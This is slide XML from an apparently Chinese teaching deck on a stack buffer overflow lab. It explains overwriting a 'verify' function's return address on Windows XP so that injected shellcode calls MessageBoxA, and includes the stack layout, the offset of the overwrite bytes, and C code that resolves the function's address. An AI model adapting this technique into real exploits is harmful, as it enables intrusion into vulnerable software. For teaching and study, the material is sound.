              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86665E0A-A96C-3826-6F56-82C3B26C3581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9670569" y="5733256"/>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8244945D-2598-5372-D8A8-47490840DC7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="427311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578DFBC-8BFE-DBB7-F778-9B7288BFAE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8604691" y="3849399"/>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6799476F-C8C5-EA96-090B-7C3104EC07C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148637" y="4294188"/>
            <a:ext cx="124585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buffer[4-7]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7" name="直线连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42392020-CAE4-C878-DAC4-43749F7651D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="467287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4092EAB-4507-C6F7-14CE-14C2247A108E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8160438" y="4717255"/>
            <a:ext cx="124585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buffer[0-3]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9" name="直线连接符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A19884C9-4497-8A79-B71F-5B7FAA940491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040213" y="509722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2C7E39FB-7190-518E-5603-CF9757560F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1929217"/>
            <a:ext cx="4824536" cy="3523209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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通过覆盖返回地址让进程执行植入的</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是最传统的漏洞利用方式。</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利用</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verify</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函数内的缓冲区溢出漏洞，植入一段代码，</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使其可以覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>返回地址，</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让返回地址指向</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shellcode</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弹出</a:t>
            </a:r>
            <a:r>
              <a:rPr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MessageBox</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窗体。</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实验环境是</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Windows XP</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环境，</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VC 6.0</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编译器。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:b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9" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27DAEDFC-6E75-06B3-AE73-D152D2AA1B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="236394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31BBC9A-2684-41F0-9D86-FBBFCF498CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040213" y="1985300"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120695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2533322"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verify</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数调用栈</a:t>
            </a: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利用思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF7F3EEC-A829-774B-DD7C-0E4D6F2AD0EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="1989454"/>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634405ED-77B7-8900-3819-0DC4A06E6C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022617" y="2008830"/>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9" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FE5A80F-0D98-57BF-F8F3-AC3B2FEB4263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7026098" y="554099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21" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21C3DA8-E8F8-B316-DE0E-4876DECD1504}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="273343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2C92651-8B81-11E6-B322-8890A9A429E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051485" y="2363949"/>
            <a:ext cx="1428888" cy="375428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{525D05F3-BF4D-E0A8-83C8-969ED09F55D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="2746921"/>
            <a:ext cx="1428891" cy="345791"/>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old</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4" name="直线连接符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A7660E4-D29A-FEB0-5F21-D0C1FE3EDB29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040214" y="310133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E0CE531-ECDC-0FEF-010E-29B0690DEADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051485" y="3112407"/>
            <a:ext cx="1428888" cy="349796"/>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flag</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6" name="直线连接符 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63731B68-A5C3-60EF-683C-5D1ECF9D6037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="346220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410DE025-7AFF-8E9E-070F-2227F954C46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="3476763"/>
            <a:ext cx="1428889" cy="378573"/>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buffer[40-43]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8" name="直线连接符 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76D3B40-6271-E7B3-A4E0-2598B662958F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="38553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124325F-F894-BA79-5627-0C5FB7AA3303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9919439" y="2762783"/>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箭头连接符 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64C80A6-648B-A7B7-DBC3-48A8E5C2473F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9651517" y="2923435"/>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DBA1C1F-3ED4-E371-451F-36EF1DB13226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984432" y="5563979"/>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箭头连接符 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86665E0A-A96C-3826-6F56-82C3B26C3581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9670569" y="5733256"/>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8244945D-2598-5372-D8A8-47490840DC7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="427311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578DFBC-8BFE-DBB7-F778-9B7288BFAE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="3869836"/>
            <a:ext cx="1428891" cy="394649"/>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6799476F-C8C5-EA96-090B-7C3104EC07C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="4286315"/>
            <a:ext cx="1428889" cy="377929"/>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buffer[4-7]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7" name="直线连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42392020-CAE4-C878-DAC4-43749F7651D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="467287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4092EAB-4507-C6F7-14CE-14C2247A108E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051485" y="4687552"/>
            <a:ext cx="1428888" cy="401043"/>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buffer[0-3]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9" name="直线连接符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A19884C9-4497-8A79-B71F-5B7FAA940491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040213" y="509722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2C7E39FB-7190-518E-5603-CF9757560F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905319" y="1706792"/>
            <a:ext cx="4824536" cy="3869457"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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为了能覆盖返回地址，需要在</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中至少写入：</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buffer</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+flag</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EBP</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值（</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字节），也就是</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53-56</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字节才是要覆盖的地址。</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让程序弹出一个消息框只需要调用</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函数</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MessageBox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="18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我们将写出调用这个</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的汇编代码，然后翻译成机器码，用十六进制编辑工具填入</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文件。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="e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9" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27DAEDFC-6E75-06B3-AE73-D152D2AA1B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="236394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31BBC9A-2684-41F0-9D86-FBBFCF498CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040213" y="1985300"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109124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利用思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C7E39FB-7190-518E-5603-CF9757560F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905319" y="1706792"/>
            <a:ext cx="4824536" cy="3869457"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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为了能覆盖返回地址，需要在</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中至少写入：</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buffer</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+flag</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前</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EBP</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值（</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4</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字节），也就是</a:t>
            </a:r>
            <a:r>
              <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53-56</a:t>
            </a:r>
            <a:r>
              <a:rPr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字节才是要覆盖的地址。</a:t>
            </a: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让程序弹出一个消息框只需要调用</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函数</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MessageBox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="18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我们将写出调用这个</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的汇编代码，然后翻译成机器码，用十六进制编辑工具填入</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文件。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="e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005E96A4-68C5-FEA4-40D0-1040CB58E9F2}"/>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24E1E613-84F4-3E5A-18CE-EB7BC7BC16D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1155220"/>
            <a:ext cx="4705904"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汇编语言调用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MessageBoxA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{073D5D10-BEA2-70CB-5E7A-17BC10E92CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1708259"/>
            <a:ext cx="4824536" cy="4673844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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装载动态链接库</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user32.dll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MessageBoxA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是动态链接库</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user32.dll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的导出函数。（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>为了让植入的机器代码更加简洁明了，在实验准备中构造漏洞程序的时候已经人工加载了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>user32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这个库，所以第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>步操作不用在汇编语言中考虑。） </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFontTx/>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在汇编语言中调用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MessageBoxA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函数需要获得函数的入口地址。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FontTx/>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在调用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MessageBoxA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前需要向栈中按从右向左的顺序压入</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个参数。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>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1109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B9BD839E-994F-65BB-43A4-9C50C894B7C4}"/>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6AE0DB59-2CDF-ADA5-CD9C-5D90B5E50B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="11221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9" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{293E90C5-84A1-8464-FAA6-7A5A9C11A00C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384031" y="1653494"/>
            <a:ext cx="5041203" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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&lt;windows.h&gt;</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AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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&lt;stdio.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>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HINSTANCE LibHandle;</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FARPROC ProcAdd;</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LibHandle = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>LoadLibrary</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"user32"</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"user32 = 0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </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LibHandle);</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ProcAdd=(FARPROC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>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(LibHandle,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"MessageBoxA"</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"MessageBoxA = 0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
